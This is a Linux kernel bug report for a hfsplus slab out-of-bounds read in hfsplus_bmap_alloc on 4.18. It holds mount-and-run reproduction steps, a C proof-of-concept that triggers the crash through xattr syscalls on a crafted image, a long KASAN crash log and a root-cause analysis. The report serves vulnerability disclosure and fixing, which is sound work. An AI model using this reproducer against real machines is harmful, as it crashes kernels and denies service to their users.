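Created attachment 276887 [details] The (compressed) crafted image which causes crash
- Reproduce (4.18)
# mkdir mnt
# mount -t hfsplus 243.img mnt
# gcc -o poc poc.c
# ./poc ./mnt
- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>

// derived from https://github.com/oracle/kernel-fuzzing/blob/master/include/mount.hh

/*
 * Replay the xattr syscall sequence that triggers the crash against
 * "<mpoint>/foo/bar/xattr" on the mounted crafted image.
 *
 * mpoint: mount point of the hfsplus image (argv[1] from main()).
 *
 * The kernel bug fires inside one of the setxattr() calls (the trace below
 * shows hfsplus_create_attr on the stack, so most likely the XATTR_CREATE
 * one), so the return values of the individual calls are only reported on
 * stderr -- every call is still issued in the original order regardless of
 * earlier failures, to keep the reproducer faithful to the fuzzer output.
 * Exits the process if the path string cannot be built.
 */
static void activity(const char *mpoint)
{
	char *xattr = NULL;
	char buf2[113];		/* 113 == 0x71, the size seen in R10 of the register dump below */

	/* asprintf() leaves xattr undefined on failure; the original passed it on unchecked */
	if (asprintf(&xattr, "%s/foo/bar/xattr", mpoint) < 0) {
		perror("asprintf");
		exit(EXIT_FAILURE);
	}
	memset(buf2, 0, sizeof(buf2));

	if (listxattr(xattr, buf2, sizeof(buf2)) < 0)
		perror("listxattr");
	if (removexattr(xattr, "user.mime_type") < 0)
		perror("removexattr");
	/* hfsplus_create_attr -> hfs_btree_inc_height -> hfsplus_bmap_alloc (see trace) */
	if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE) < 0)
		perror("setxattr(XATTR_CREATE)");
	if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE) < 0)
		perror("setxattr(XATTR_REPLACE)");

	free(xattr);	/* leaked in the original */
}

/* Usage: ./poc <mountpoint>.  Refuses to run without the argument. */
int main(int argc, char *argv[])
{
	if (argc < 2) {
		fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
		return EXIT_FAILURE;
	}
	activity(argv[1]);
	return 0;
}
- Kernel message
[ 177.089299] ================================================================== [ 177.090973] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x2f2/0x690 [ 177.092451] Read of size 8 at addr ffff8801e2813170 by task poc/1408 [ 177.094086] CPU: 0 PID: 1408 Comm: poc Not tainted 4.18.0-rc1+ #6 [ 177.094094] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 177.094100] Call Trace: [ 177.094137] dump_stack+0x7b/0xb5 [ 177.094172] print_address_description+0x70/0x290 [ 177.094178] kasan_report+0x291/0x390 [ 177.094183] ? hfsplus_bmap_alloc+0x2f2/0x690 [ 177.094199] __asan_load8+0x54/0x90 [ 177.094205] hfsplus_bmap_alloc+0x2f2/0x690 [ 177.094210] ? hfsplus_btree_write+0x1d0/0x1d0 [ 177.094214] ? save_stack+0xb5/0xd0 [ 177.094218] ? save_stack+0x46/0xd0 [ 177.094221] ? kasan_kmalloc+0xad/0xe0 [ 177.094225] ? 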
__kmalloc+0x11f/0x240 [ 177.094230] ? hfsplus_find_init+0x54/0xc0 [ 177.094235] ? hfsplus_create_attr+0x10c/0x2b0 [ 177.094239] ? __hfsplus_setxattr+0x2d5/0x1160 [ 177.094244] ? hfsplus_setxattr+0x8a/0xb0 [ 177.094247] ? hfsplus_user_setxattr+0x27/0x30 [ 177.094260] ? __vfs_setxattr+0x7c/0xa0 [ 177.094265] ? __vfs_setxattr_noperm+0x8d/0x200 [ 177.094269] ? vfs_setxattr+0xb3/0xc0 [ 177.094272] ? setxattr+0x1b3/0x260 [ 177.094276] ? path_setxattr+0x134/0x170 [ 177.094280] ? __x64_sys_setxattr+0x6d/0x80 [ 177.094302] ? do_syscall_64+0x78/0x170 [ 177.094318] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.094324] hfs_btree_inc_height+0xd3/0x450 [ 177.094330] ? hfs_bnode_split+0x6b0/0x6b0 [ 177.094344] ? char2uni+0x8f/0xf0 [ 177.094349] ? char2uni+0x50/0x50 [ 177.094355] hfsplus_brec_insert+0x679/0x6c0 [ 177.094360] ? hfsplus_brec_find+0xe0/0x2e0 [ 177.094366] ? hfsplus_brec_keylen+0x130/0x130 [ 177.094370] ? __kmalloc+0x11f/0x240 [ 177.094376] hfsplus_create_attr+0x263/0x2b0 [ 177.094381] ? hfsplus_attr_exists+0x140/0x140 [ 177.094390] ? hfsplus_find_init+0x54/0xc0 [ 177.094399] ? strncmp+0x3d/0xc0 [ 177.094404] __hfsplus_setxattr+0x2d5/0x1160 [ 177.094426] ? unwind_get_return_address+0x36/0x50 [ 177.094432] ? kasan_check_write+0x14/0x20 [ 177.094437] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 177.094443] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 177.094447] ? save_stack+0x46/0xd0 [ 177.094451] ? kasan_kmalloc+0xad/0xe0 [ 177.094455] ? kmem_cache_alloc_trace+0x102/0x200 [ 177.094460] ? hfsplus_setxattr+0x4c/0xb0 [ 177.094463] ? hfsplus_user_setxattr+0x27/0x30 [ 177.094467] ? __vfs_setxattr+0x7c/0xa0 [ 177.094471] ? __vfs_setxattr_noperm+0x8d/0x200 [ 177.094474] ? vfs_setxattr+0xb3/0xc0 [ 177.094478] ? setxattr+0x1b3/0x260 [ 177.094481] ? path_setxattr+0x134/0x170 [ 177.094485] ? __x64_sys_setxattr+0x6d/0x80 [ 177.094490] ? do_syscall_64+0x78/0x170 [ 177.094494] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.094499] ? save_stack+0xb5/0xd0 [ 177.094502] ? 
save_stack+0x46/0xd0 [ 177.094505] ? kasan_kmalloc+0xad/0xe0 [ 177.094509] ? __kmalloc_node+0x11e/0x2e0 [ 177.094522] ? kvmalloc_node+0x31/0x80 [ 177.094526] ? setxattr+0x114/0x260 [ 177.094530] ? path_setxattr+0x134/0x170 [ 177.094534] ? __x64_sys_setxattr+0x6d/0x80 [ 177.094538] ? do_syscall_64+0x78/0x170 [ 177.094542] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.094546] ? save_stack+0xb5/0xd0 [ 177.094549] ? save_stack+0x46/0xd0 [ 177.094553] ? __kasan_slab_free+0x13c/0x1a0 [ 177.094556] ? kasan_slab_free+0xe/0x10 [ 177.094560] ? kmem_cache_free+0x89/0x1e0 [ 177.094569] ? putname+0x80/0x90 [ 177.094573] ? filename_lookup+0x191/0x280 [ 177.094577] ? kasan_unpoison_shadow+0x36/0x50 [ 177.094581] ? kasan_kmalloc+0xad/0xe0 [ 177.094586] ? kmem_cache_alloc_trace+0x102/0x200 [ 177.094591] hfsplus_setxattr+0x8a/0xb0 [ 177.094596] hfsplus_user_setxattr+0x27/0x30 [ 177.094600] __vfs_setxattr+0x7c/0xa0 [ 177.094605] __vfs_setxattr_noperm+0x8d/0x200 [ 177.094609] vfs_setxattr+0xb3/0xc0 [ 177.094614] setxattr+0x1b3/0x260 [ 177.094618] ? vfs_setxattr+0xc0/0xc0 [ 177.094621] ? filename_lookup+0x191/0x280 [ 177.094625] ? filename_parentat+0x2b0/0x2b0 [ 177.094630] ? kasan_kmalloc+0xad/0xe0 [ 177.094635] ? kasan_check_write+0x14/0x20 [ 177.094657] ? strncpy_from_user+0xa8/0x1c0 [ 177.094670] ? __mnt_is_readonly.part.13+0x23/0x30 [ 177.094676] ? __mnt_want_write+0x9d/0xb0 [ 177.094681] path_setxattr+0x134/0x170 [ 177.094685] ? 
setxattr+0x260/0x260 [ 177.094690] __x64_sys_setxattr+0x6d/0x80 [ 177.094695] do_syscall_64+0x78/0x170 [ 177.094701] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.094720] RIP: 0033:0x7fc353f381fa [ 177.094722] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 177.094785] RSP: 002b:00007ffefddf89c8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 177.094794] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc353f381fa [ 177.094797] RDX: 00007ffefddf8ab0 RSI: 0000000000401498 RDI: 000000000062b0c0 [ 177.094799] RBP: 00007ffefddf8b30 R08: 0000000000000001 R09: 0000000000000000 [ 177.094802] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400c20 [ 177.094804] R13: 00007ffefddf8c30 R14: 0000000000000000 R15: 0000000000000000 [ 177.095151] Allocated by task 1408: [ 177.095876] save_stack+0x46/0xd0 [ 177.095880] kasan_kmalloc+0xad/0xe0 [ 177.095884] __kmalloc+0x11f/0x240 [ 177.095888] __hfs_bnode_create+0xc6/0x3f0 [ 177.095892] hfsplus_bnode_find+0x1f0/0x500 [ 177.095896] hfsplus_bmap_alloc+0x296/0x690 [ 177.095900] hfs_btree_inc_height+0xd3/0x450 [ 177.095904] hfsplus_brec_insert+0x679/0x6c0 [ 177.095908] hfsplus_create_attr+0x263/0x2b0 [ 177.095913] __hfsplus_setxattr+0x2d5/0x1160 [ 177.095917] hfsplus_setxattr+0x8a/0xb0 [ 177.095924] hfsplus_user_setxattr+0x27/0x30 [ 177.095928] __vfs_setxattr+0x7c/0xa0 [ 177.095932] __vfs_setxattr_noperm+0x8d/0x200 [ 177.095935] vfs_setxattr+0xb3/0xc0 [ 177.095938] setxattr+0x1b3/0x260 [ 177.095941] path_setxattr+0x134/0x170 [ 177.095945] __x64_sys_setxattr+0x6d/0x80 [ 177.095949] do_syscall_64+0x78/0x170 [ 177.095953] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.096298] Freed by task 0: [ 177.096896] (stack is not available) [ 177.097952] The buggy address belongs to the object at ffff8801e2813100 which belongs to the cache kmalloc-96 of size 96 [ 177.100418] The buggy 
address is located 16 bytes to the right of 96-byte region [ffff8801e2813100, ffff8801e2813160) [ 177.102812] The buggy address belongs to the page: [ 177.103793] page:ffffea00078a04c0 count:1 mapcount:0 mapping:ffff8801f6803500 index:0x0 [ 177.105412] flags: 0x2ffff0000000100(slab) [ 177.106250] raw: 02ffff0000000100 dead000000000100 dead000000000200 ffff8801f6803500 [ 177.107793] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000 [ 177.109347] page dumped because: kasan: bad access detected [ 177.110784] Memory state around the buggy address: [ 177.111755] ffff8801e2813000: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc [ 177.113212] ffff8801e2813080: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc [ 177.114657] >ffff8801e2813100: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc [ 177.116099] ^ [ 177.117488] ffff8801e2813180: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 177.118931] ffff8801e2813200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 177.129577] ================================================================== [ 177.131051] Disabling lock debugging due to kernel taint [ 177.133614] general protection fault: 0000 [#1] SMP KASAN PTI [ 177.134841] CPU: 1 PID: 1408 Comm: poc Tainted: G B 4.18.0-rc1+ #6 [ 177.136473] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 177.138439] RIP: 0010:hfsplus_bmap_alloc+0x568/0x690 [ 177.139450] Code: e0 4c 03 05 6a 64 94 01 66 45 85 ff 49 89 dc 0f 84 20 fe ff ff 44 89 eb 4c 89 85 f0 fe ff ff 4c 01 c3 48 89 df e8 28 ab de ff <0f> b6 33 4c 8b 85 f0 fe ff ff 40 80 fe ff 74 1a 31 d2 b8 80 ff ff [ 177.143261] RSP: 0018:ffff8801f1df7358 EFLAGS: 00010286 [ 177.144325] RAX: 0000000000000000 RBX: 00050800000000f8 RCX: ffffffffad5b2a08 [ 177.145751] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 00050800000000f8 [ 177.147177] RBP: ffff8801f1df74a0 R08: 0005080000000000 R09: ffffed003dd8d499 [ 177.148611] R10: 0000000000000001 R11: ffffed003dd8d498 R12: 
ffff8801e2813100 [ 177.150034] R13: 00000000000000f8 R14: ffff8801e2813170 R15: 00000000ffffdf00 [ 177.151455] FS: 00007fc354417700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 177.153082] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 177.154236] CR2: 0000000002514698 CR3: 00000001f3ff6000 CR4: 00000000000006e0 [ 177.155667] Call Trace: [ 177.156187] ? hfsplus_btree_write+0x1d0/0x1d0 [ 177.157129] ? save_stack+0xb5/0xd0 [ 177.157850] ? save_stack+0x46/0xd0 [ 177.158571] ? kasan_kmalloc+0xad/0xe0 [ 177.159348] ? __kmalloc+0x11f/0x240 [ 177.160085] ? hfsplus_find_init+0x54/0xc0 [ 177.160937] ? hfsplus_create_attr+0x10c/0x2b0 [ 177.161844] ? __hfsplus_setxattr+0x2d5/0x1160 [ 177.162747] ? hfsplus_setxattr+0x8a/0xb0 [ 177.163562] ? hfsplus_user_setxattr+0x27/0x30 [ 177.164485] ? __vfs_setxattr+0x7c/0xa0 [ 177.165274] ? __vfs_setxattr_noperm+0x8d/0x200 [ 177.166196] ? vfs_setxattr+0xb3/0xc0 [ 177.166945] ? setxattr+0x1b3/0x260 [ 177.167663] ? path_setxattr+0x134/0x170 [ 177.168477] ? __x64_sys_setxattr+0x6d/0x80 [ 177.169342] ? do_syscall_64+0x78/0x170 [ 177.170147] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.171206] hfs_btree_inc_height+0xd3/0x450 [ 177.172087] ? hfs_bnode_split+0x6b0/0x6b0 [ 177.172947] ? char2uni+0x8f/0xf0 [ 177.173637] ? char2uni+0x50/0x50 [ 177.174327] hfsplus_brec_insert+0x679/0x6c0 [ 177.175203] ? hfsplus_brec_find+0xe0/0x2e0 [ 177.176063] ? hfsplus_brec_keylen+0x130/0x130 [ 177.176988] ? __kmalloc+0x11f/0x240 [ 177.177727] hfsplus_create_attr+0x263/0x2b0 [ 177.178601] ? hfsplus_attr_exists+0x140/0x140 [ 177.179511] ? hfsplus_find_init+0x54/0xc0 [ 177.180370] ? strncmp+0x3d/0xc0 [ 177.181040] __hfsplus_setxattr+0x2d5/0x1160 [ 177.181928] ? unwind_get_return_address+0x36/0x50 [ 177.182904] ? kasan_check_write+0x14/0x20 [ 177.183747] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 177.184688] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 177.185870] ? save_stack+0x46/0xd0 [ 177.186591] ? kasan_kmalloc+0xad/0xe0 [ 177.187363] ? 
kmem_cache_alloc_trace+0x102/0x200 [ 177.188334] ? hfsplus_setxattr+0x4c/0xb0 [ 177.189156] ? hfsplus_user_setxattr+0x27/0x30 [ 177.190062] ? __vfs_setxattr+0x7c/0xa0 [ 177.190850] ? __vfs_setxattr_noperm+0x8d/0x200 [ 177.191772] ? vfs_setxattr+0xb3/0xc0 [ 177.192537] ? setxattr+0x1b3/0x260 [ 177.193259] ? path_setxattr+0x134/0x170 [ 177.194066] ? __x64_sys_setxattr+0x6d/0x80 [ 177.194923] ? do_syscall_64+0x78/0x170 [ 177.195711] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.196784] ? save_stack+0xb5/0xd0 [ 177.197503] ? save_stack+0x46/0xd0 [ 177.198221] ? kasan_kmalloc+0xad/0xe0 [ 177.198992] ? __kmalloc_node+0x11e/0x2e0 [ 177.199825] ? kvmalloc_node+0x31/0x80 [ 177.200606] ? setxattr+0x114/0x260 [ 177.201323] ? path_setxattr+0x134/0x170 [ 177.202127] ? __x64_sys_setxattr+0x6d/0x80 [ 177.202979] ? do_syscall_64+0x78/0x170 [ 177.203762] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.204828] ? save_stack+0xb5/0xd0 [ 177.205548] ? save_stack+0x46/0xd0 [ 177.206266] ? __kasan_slab_free+0x13c/0x1a0 [ 177.207139] ? kasan_slab_free+0xe/0x10 [ 177.208001] ? kmem_cache_free+0x89/0x1e0 [ 177.208854] ? putname+0x80/0x90 [ 177.209525] ? filename_lookup+0x191/0x280 [ 177.210366] ? kasan_unpoison_shadow+0x36/0x50 [ 177.211279] ? kasan_kmalloc+0xad/0xe0 [ 177.212057] ? kmem_cache_alloc_trace+0x102/0x200 [ 177.213034] hfsplus_setxattr+0x8a/0xb0 [ 177.213829] hfsplus_user_setxattr+0x27/0x30 [ 177.214709] __vfs_setxattr+0x7c/0xa0 [ 177.215470] __vfs_setxattr_noperm+0x8d/0x200 [ 177.216380] vfs_setxattr+0xb3/0xc0 [ 177.217104] setxattr+0x1b3/0x260 [ 177.217795] ? vfs_setxattr+0xc0/0xc0 [ 177.218552] ? filename_lookup+0x191/0x280 [ 177.219397] ? filename_parentat+0x2b0/0x2b0 [ 177.220285] ? kasan_kmalloc+0xad/0xe0 [ 177.221062] ? kasan_check_write+0x14/0x20 [ 177.221922] ? strncpy_from_user+0xa8/0x1c0 [ 177.222791] ? __mnt_is_readonly.part.13+0x23/0x30 [ 177.223771] ? __mnt_want_write+0x9d/0xb0 [ 177.224615] path_setxattr+0x134/0x170 [ 177.225393] ? 
setxattr+0x260/0x260 [ 177.226120] __x64_sys_setxattr+0x6d/0x80 [ 177.226949] do_syscall_64+0x78/0x170 [ 177.227710] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 177.228775] RIP: 0033:0x7fc353f381fa [ 177.229511] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 177.233310] RSP: 002b:00007ffefddf89c8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 177.234822] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fc353f381fa [ 177.236258] RDX: 00007ffefddf8ab0 RSI: 0000000000401498 RDI: 000000000062b0c0 [ 177.237686] RBP: 00007ffefddf8b30 R08: 0000000000000001 R09: 0000000000000000 [ 177.239108] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400c20 [ 177.240543] R13: 00007ffefddf8c30 R14: 0000000000000000 R15: 0000000000000000 [ 177.241976] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 177.251777] ---[ end trace 7f5a46c7478f1295 ]--- [ 177.252789] RIP: 0010:hfsplus_bmap_alloc+0x568/0x690 [ 177.253803] Code: e0 4c 03 05 6a 64 94 01 66 45 85 ff 49 89 dc 0f 84 20 fe ff ff 44 89 eb 4c 89 85 f0 fe ff ff 4c 01 c3 48 89 df e8 28 ab de ff <0f> b6 33 4c 8b 85 f0 fe ff ff 40 80 fe ff 74 1a 31 d2 b8 80 ff ff [ 177.257692] RSP: 0018:ffff8801f1df7358 EFLAGS: 00010286 [ 177.258764] RAX: 0000000000000000 RBX: 00050800000000f8 RCX: ffffffffad5b2a08 [ 177.260236] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 00050800000000f8 [ 177.261707] RBP: 
ffff8801f1df74a0 R08: 0005080000000000 R09: ffffed003dd8d499 [ 177.263152] R10: 0000000000000001 R11: ffffed003dd8d498 R12: ffff8801e2813100 [ 177.264643] R13: 00000000000000f8 R14: ffff8801e2813170 R15: 00000000ffffdf00 [ 177.266095] FS: 00007fc354417700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 177.267724] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 177.268944] CR2: 0000000002514698 CR3: 00000001f3ff6000 CR4: 00000000000006e0
- Reason https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/btree.c#L391 while (len) { byte = data[off]; if (byte != 0xff) { for (m = 0x80, i = 0; i < 8; m >>= 1, i++) { if (!(byte & m)) { idx += i; data[off] |= m; set_page_dirty(*pagep); kunmap(*pagep); tree->free_nodes--; mark_inode_dirty(tree->inode); hfs_bnode_put(node); return hfs_bnode_create(tree, idx); } } } if (++off >= PAGE_SIZE) { kunmap(*pagep); data = kmap(*++pagep); off = 0; } idx += 8; len--; }
In this loop the walk over the allocation bitmap is bounded only by `len`, and `pagep` is advanced with `*++pagep` without any check that it still points inside the node's page array, so once `len` exceeds what the node's pages actually hold the loop reads past the end of `data` / the page array. Where `len` is initialised is not visible in this excerpt, but since the image is attacker-controlled it should be treated as derived from on-disk B-tree header fields and validated against the node's real page count (this should be confirmed against btree.c). The KASAN report above is an 8-byte read 16 bytes past a 96-byte kmalloc-96 object allocated in `__hfs_bnode_create`, which is consistent with `*++pagep` fetching a page pointer beyond the end of the bnode's page array rather than with the one-byte `byte = data[off]` load itself; the general protection fault that follows (faulting instruction `0f b6 33`, a byte load through RBX=00050800000000f8) then looks like `data[off]` being read through the mapping of that garbage page pointer. Note that reproducing this needs a crafted hfsplus image to be mounted, which normally requires CAP_SYS_ADMIN or an auto-mounting desktop setup, so the realistic impact is a kernel out-of-bounds read and crash (DoS) triggered by a malicious filesystem image. Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.